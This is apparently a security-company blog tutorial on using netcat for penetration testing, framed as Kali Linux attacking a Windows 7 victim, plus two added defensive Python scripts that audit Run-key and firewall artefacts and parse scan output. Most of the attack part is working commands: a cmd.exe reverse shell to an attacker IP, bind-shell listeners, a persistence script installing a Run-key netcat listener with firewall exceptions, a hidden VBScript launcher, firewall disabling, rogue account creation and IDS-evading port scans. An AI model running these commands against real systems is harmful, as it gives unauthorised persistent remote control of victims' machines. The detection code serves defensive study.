NETCAT
Netcat is a computer network utility used for reading from and writing to network connections, and for sending and receiving files over a network using TCP and UDP. The tool is very well known for debugging networks and for investigation purposes. Netcat is also known as nc or the "Swiss army knife" of networking. It is a critical tool for network admins, programmers and penetration testers.
NETCAT SETUP:
Setting up netcat on Windows is very simple. Download netcat for Windows from the given link: https://joncraton.org/blog/46/netcat-for-windows/.
Once downloaded, extract the archive into the C: drive. Then open a command prompt and navigate to the netcat directory (yes, I know we are lazy; the shortcut to open a command prompt in the same directory is to go to the netcat directory, hold Shift, right-click, and choose the option "Open command window here") and run nc.exe.
On Linux, netcat is usually pre-installed, so we don't need to worry about it. If you don't find it on your Linux system, open a terminal and type "apt-get install netcat". This command will install netcat for you.
In this blog I am using Kali Linux as my attacker machine and Windows 7 as the victim machine.
PENETRATION TESTING WITH NETCAT
Netcat has two primary modes of operation: one is as a client, and the other is as a server. These two modes are a hacker's favourite, and penetration testers use them as well.
The primary usage of the two modes is to connect to somewhere (client) or to listen for inbound connections (server):
connect to somewhere: nc [-options] hostname port[s] [ports] ...   # syntax for netcat client mode
listen for inbound:   nc -l -p port [options] [hostname] [port]     # syntax for netcat server mode
The most commonly used options in netcat are:
-c shell commands   as `-e'; use /bin/sh to exec [dangerous!!]
-e filename         program to exec after connect [dangerous!!]
-l                  listen mode, for inbound connects
-n                  numeric-only IP addresses, no DNS
-p port             local port number
-u                  UDP mode
-v                  verbose [use twice to be more verbose]
-z                  zero-I/O mode [used for scanning]
Netcat's most potent option is -e prog. It is most often used in server (listen) mode, where it makes netcat run the specified program and bind it to the connection as soon as a client connects; it also works in client mode, as the reverse shell example below shows.
nc -l -p 1234 -e cmd.exe   # Windows
nc -l -p 1234 -e /bin/sh   # Linux
These are the basics of netcat. If you are still a beginner with netcat, read this article for a clearer understanding: http://scitechconnect.elsevier.com/wp-content/uploads/2013/09/Introduction-to-Netcat.pdf
Let's get into real-time penetration testing with netcat.
Let's get a basic reverse shell from Windows 7:
nc -lvp 1234                           # Kali Linux (listener)
nc.exe 192.168.0.151 1234 -e cmd.exe   # Windows (the IP mentioned is the Kali IP address)
When the victim runs the command, I get a reverse shell in Kali.
POST EXPLOITATION WITH NETCAT
Post exploitation is the crucial phase of penetration testing, and the fun part too. So here are some of the fun things we can do using netcat.
Once we get a reverse shell from the victim system, we need to do the following steps. The first is maintaining the connection.
All attackers face a big problem, which is session expiration. So here are some commands to make the session persistent.
@echo off
rem copy nc.exe from the user's desktop into System32
xcopy "%systemdrive%\%username%\Desktop\nc.exe" "C:\Windows\System32\" -y
rem autorun value: start a persistent netcat listener on port 449 at every logon
reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t REG_SZ /d "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"
rem firewall rules allowing the listener's port and the nc.exe program inbound
netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow protocol=UDP localport=449
netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow program="C:\windows\system32\nc.exe"
NOTE: these commands must be run as administrator.
RUNNING THE NETCAT IN BACKGROUND
Here is the VBScript to run netcat in the background, so that you don't have to wait for the user to restart their computer (the Run key above only fires at the next logon).
Dim objShell
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"
Set objShell = Nothing
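From the defender's side, the persistence script above leaves two artefacts that are easy to audit: a Run-key value that starts a netcat binary in listen mode with a program bound to the socket, and firewall rules that allow that binary or its port inbound. The following is an added example written for this page, not code from the blog or from BriskInfoSec. It runs the check over constructed sample data: a dictionary of Run-key value names and commands, and a list of dictionaries whose keys mimic the field names printed by "netsh advfirewall firewall show rule name=all verbose" (the dictionaries themselves are made up for the example, not captured output). In a real audit you would fill those structures from the registry and from netsh.

```python
import ntpath
from typing import Dict, List, NamedTuple, Optional, Set

# Binary names treated as netcat. Matching is on the basename so that an
# unrelated "sync.exe" does not trip a plain endswith("nc.exe") check.
NETCAT_NAMES = ("nc.exe", "ncat.exe", "netcat.exe")

class Finding(NamedTuple):
    source: str   # "run-key" or "firewall"
    name: str     # registry value name or firewall rule name
    reason: str

def _tokens(command: str) -> List[str]:
    # Crude tokenizer: drop quotes, split on whitespace. Enough for the short
    # command lines stored in Run values.
    return command.replace('"', " ").split()

def _is_netcat(path: str) -> bool:
    return ntpath.basename(path).lower() in NETCAT_NAMES

def _option_letters(tokens: List[str]) -> Set[str]:
    # Letters of every single-dash option cluster, e.g. "-Ldp" -> {"L", "d", "p"}.
    letters: Set[str] = set()
    for t in tokens:
        if len(t) > 1 and t.startswith("-") and not t.startswith("--"):
            letters.update(t[1:])
    return letters

def _listen_port(tokens: List[str]) -> Optional[int]:
    # The port follows the cluster containing "p" ("-p 1234" or "-Ldp 449").
    for i, t in enumerate(tokens[:-1]):
        if t.startswith("-") and "p" in t[1:] and tokens[i + 1].isdigit():
            return int(tokens[i + 1])
    return None

def check_run_values(run_values: Dict[str, str]) -> List[Finding]:
    """Flag autorun entries that launch netcat, with the reasons found."""
    findings = []
    for name, command in run_values.items():
        tokens = _tokens(command)
        if not any(_is_netcat(t) for t in tokens):
            continue
        letters = _option_letters(tokens)
        reasons = ["netcat binary launched at logon"]
        if letters & {"l", "L"}:
            reasons.append("listen mode (-l/-L)")
        if letters & {"e", "c"}:
            reasons.append("program bound to the socket (-e/-c)")
        port = _listen_port(tokens)
        if port is not None:
            reasons.append(f"port {port}")
        findings.append(Finding("run-key", name, "; ".join(reasons)))
    return findings

def check_firewall_rules(rules: List[Dict[str, str]], listener_ports: Set[int]) -> List[Finding]:
    """Flag inbound allow rules for a netcat binary or for a port a netcat autorun listens on."""
    findings = []
    for r in rules:
        if r.get("Direction") != "In" or r.get("Action") != "Allow":
            continue
        prog = r.get("Program", "Any")
        port = r.get("LocalPort", "Any")
        if _is_netcat(prog):
            findings.append(Finding("firewall", r["Rule Name"], f"inbound allow for {prog}"))
        elif port.isdigit() and int(port) in listener_ports:
            findings.append(Finding("firewall", r["Rule Name"],
                                    f"inbound allow on port {port} used by a netcat autorun"))
    return findings

def audit(run_values: Dict[str, str], rules: List[Dict[str, str]]) -> List[Finding]:
    """Correlate Run-key listeners with firewall rules; returns all findings."""
    run_findings = check_run_values(run_values)
    ports = {_listen_port(_tokens(run_values[f.name])) for f in run_findings}
    ports.discard(None)
    return run_findings + check_firewall_rules(rules, ports)

# Constructed sample: the autorun value from the script above plus one benign entry.
SAMPLE_RUN_VALUES = {
    "system": r"C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe",
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
}
# Constructed rules keyed like the fields of "netsh advfirewall firewall show rule name=all verbose".
SAMPLE_RULES = [
    {"Rule Name": "Rule 34", "Direction": "In", "Action": "Allow",
     "Protocol": "UDP", "LocalPort": "449", "Program": "Any"},
    {"Rule Name": "Allow Messenger", "Direction": "In", "Action": "Allow",
     "Protocol": "Any", "LocalPort": "Any", "Program": r"C:\windows\system32\nc.exe"},
    {"Rule Name": "Core Networking - DHCP (DHCP-In)", "Direction": "In", "Action": "Allow",
     "Protocol": "UDP", "LocalPort": "68", "Program": r"%SystemRoot%\system32\svchost.exe"},
]

if __name__ == "__main__":
    for f in audit(SAMPLE_RUN_VALUES, SAMPLE_RULES):
        print(f"[{f.source}] {f.name}: {f.reason}")
```

The port correlation is what makes the firewall check useful: "Rule 34" names no program, so on its own it looks like any other port rule, but it allows exactly the port the autorun listener binds. Note that the script's listener is TCP (no -u) while "Rule 34" allows UDP, so the rule that actually matters for the listener is the program-based "Allow Messenger" one; the audit flags both.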
Play with the firewall
netsh advfirewall set allprofiles state off
– Turns the firewall off (Windows will notify the user)
netsh advfirewall set allprofiles state on
– Turns firewall on
netsh advfirewall reset
– Reset the firewall back to default
netsh advfirewall set allprofiles firewallpolicy blockinbound,allowoutbound
– Block everything
netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=block dir=IN
– Add a port rule (as written this blocks inbound TCP 80; action=allow would open the port)
netsh advfirewall firewall delete rule name="HTTP"
– Delete a rule
Scheduled tasks
We can also mess with Windows scheduled tasks: we can create, delete and run a task.
Creating tasks (system, user, password, runasuser and runaspassword are placeholders to fill in)
– SCHTASKS /Create /S system /U user /P password /RU runasuser /RP runaspassword /SC HOURLY /TN rtest1 /TR notepad
Deleting tasks
– SCHTASKS /Delete /TN "Backup and Restore"
Running tasks
– SCHTASKS /Run /TN "StartBackup"
Now let's create and add a local user and grant it administrator rights. The command below creates the account:
net user briskinfosec Netcat /add /comment:"Approved through 3/07/2018 per CTO" /fullname:"brisk info sec"
Netcat can also be used for scanning ports on the network.
nc -v 192.168.0.170 -z 1-1000   # ip = target ip
OUTPUT:
root@7h3pr0xy:~# nc -v 192.168.0.170 -z 1-1000
192.168.0.170: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.0.170] 554 (rtsp) open
(UNKNOWN) [192.168.0.170] 445 (microsoft-ds) open
(UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open
(UNKNOWN) [192.168.0.170] 135 (loc-srv) open
Sometimes we also need to randomise the order of the ports scanned against the target so as not to alert the IDS (intrusion detection system) or IPS (intrusion prevention system); the -r option does this.
nc -v -r 192.168.0.170 -z 1-1000
OUTPUT:
root@7h3pr0xy:~# nc -v -r 192.168.0.170 -z 1-1000
192.168.0.170: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.0.170] 445 (microsoft-ds) open
(UNKNOWN) [192.168.0.170] 135 (loc-srv) open
(UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open
(UNKNOWN) [192.168.0.170] 554 (rtsp) open
While performing penetration testing, too little information will not help us move forward, so we look for more details. Netcat's verbose option (-v, or -vv for even more output) gives more information about the target, including the closed ports.
nc -vv -r 192.168.0.170 -z 130-140
OUTPUT:
root@7h3pr0xy:~# nc -vv -r 192.168.0.170 -z 130-140
192.168.0.170: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.0.170] 131 (?) : Connection refused
(UNKNOWN) [192.168.0.170] 135 (loc-srv) open
(UNKNOWN) [192.168.0.170] 130 (?) : Connection refused
(UNKNOWN) [192.168.0.170] 134 (?) : Connection refused
(UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open
(UNKNOWN) [192.168.0.170] 133 (?) : Connection refused
(UNKNOWN) [192.168.0.170] 140 (?) : Connection refused
(UNKNOWN) [192.168.0.170] 132 (?) : Connection refused
(UNKNOWN) [192.168.0.170] 137 (netbios-ns) : Connection refused
(UNKNOWN) [192.168.0.170] 138 (netbios-dgm) : Connection refused
(UNKNOWN) [192.168.0.170] 136 (?) : Connection refused
sent 0, rcvd 0
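The scan output above is line-oriented but noisy (prompt echo, the failed reverse lookup, the "sent 0, rcvd 0" trailer), and with -r the ports come back in random order. Whether you are writing up a test or building a tool that ingests netcat output on the blue-team side, the first step is to parse those lines into structured results. The following parser is an added example for this page, not code from the blog; the sample text it parses is constructed from the output format shown above, not a fresh capture.

```python
import re
from typing import List, NamedTuple, Optional

# One result line of "nc -v[v] -z" output, in either of the two shapes seen above:
#   (UNKNOWN) [192.168.0.170] 445 (microsoft-ds) open
#   (UNKNOWN) [192.168.0.170] 131 (?) : Connection refused
LINE_RE = re.compile(
    r"^\((?P<host>[^)]*)\)\s+\[(?P<ip>[^\]]+)\]\s+(?P<port>\d+)\s+"
    r"\((?P<service>[^)]*)\)\s*(?::\s*)?"
    r"(?P<state>open|Connection refused|Connection timed out)\s*$"
)

class ScanResult(NamedTuple):
    ip: str
    port: int
    service: Optional[str]   # None when netcat printed "(?)" (no /etc/services name)
    is_open: bool
    state: str

def parse_nc_scan(output: str) -> List[ScanResult]:
    """Parse netcat -v -z output into results sorted by port (undoing -r's shuffle)."""
    results = []
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue   # prompt echo, "inverse host lookup failed", "sent 0, rcvd 0"
        service = m.group("service")
        results.append(ScanResult(
            ip=m.group("ip"),
            port=int(m.group("port")),
            service=None if service == "?" else service,
            is_open=(m.group("state") == "open"),
            state=m.group("state"),
        ))
    return sorted(results, key=lambda r: r.port)

def open_ports(output: str) -> List[int]:
    """Just the open ports, ascending."""
    return [r.port for r in parse_nc_scan(output) if r.is_open]

# Constructed sample in the format of the -vv -r output above.
SAMPLE = """\
root@7h3pr0xy:~# nc -vv -r 192.168.0.170 -z 130-140
192.168.0.170: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.0.170] 131 (?) : Connection refused
(UNKNOWN) [192.168.0.170] 135 (loc-srv) open
(UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open
(UNKNOWN) [192.168.0.170] 137 (netbios-ns) : Connection refused
sent 0, rcvd 0
"""

if __name__ == "__main__":
    for r in parse_nc_scan(SAMPLE):
        print(f"{r.ip}:{r.port:<5} {r.service or '-':<12} {r.state}")
    print("open:", open_ports(SAMPLE))
```

With -v (single) only open ports are printed, so the parser sees nothing but "open" lines; with -vv the refused ports appear too, which is why the state is kept rather than collapsed to a boolean.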
Netcat can be used for offensive as well as defensive purposes. If you are good at programming, you can automate the whole process.
NOTE: use this Swiss army knife in a useful way, so that no one gets hurt on its sharp edge.
Play safe and be safe
AUTHOR
Venkatesh C.S
Security Engineer
BriskInfoSec Technology and Consulting PVT LTD
Find me @ https://www.linkedin.com/in/venkatesh-c-s-44174711b/